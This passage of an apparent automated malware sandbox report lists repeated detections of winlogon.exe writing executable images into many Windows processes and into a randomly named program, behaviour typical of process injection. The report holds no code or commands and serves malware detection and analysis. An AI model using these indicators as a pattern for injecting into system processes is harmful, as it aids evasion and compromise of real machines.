        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 19CDA5A0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\spoolsv.exe base: 6E0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1A5F41B0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 27B14120000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1BCB8350000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 17A379A0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 250F1D60000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 11DEF540000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 23B351A0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1CA9F190000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1D56C5D0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1E5CF260000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1B558CB0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 17A21740000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 20FA22F0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD4E000000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\sihost.exe base: 17B78700000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 22EB7B30000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 210A8A00000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 2B28DE00000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 157ABEB0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\ctfmon.exe base: 25BB8540000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1E697F40000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\explorer.exe base: 7F20000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 15C57B50000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 2B9EF760000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\dasHost.exe base: 24C894C0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 21F961C0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1C81BC40000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2904A8A0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\dllhost.exe base: 2436BB30000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\smartscreen.exe base: 172339F0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 26FA2F80000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 25BE2B30000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 272D8A60000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1F8FBBC0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1CF2A9B0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 20537200000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\conhost.exe base: 1E3C3A90000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 29B0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\dllhost.exe base: 20E40470000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 238A9A60000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AE0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1040000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1480000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: DB0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1300000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: B90000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 11E0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 3040000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2B30000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AB0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: D10000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 22A0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AD0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2EB0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2700000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2DB0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2400000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: B60000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 8A0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2A50000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 3010000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 980000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: D80000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1150000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2350000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2980000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: A60000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: F30000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: C60000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AF0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 7D0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2610000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1380000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2200000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2DA0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 24B0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: B60000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AF0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: A60000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 930000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 12D0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 6F0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AB0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 26F0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 11C0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2240000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 11E0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: CB0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 780000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: ED0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1FD0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2400000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 7E0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2D50000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 26F0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AF0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 14E0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 9E0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: EF0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: A60000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 12A0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1200000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: ED0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2B10000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 860000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2B60000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2AD0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2EA0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1000000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2BE0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: FD0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2DC0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 18D132A0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\cmd.exe base: 1B780BB0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\conhost.exe base: 264072F0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 2C5BFFD0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1AE450000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 15220450000 value starts with: 4D5AJump to behavior
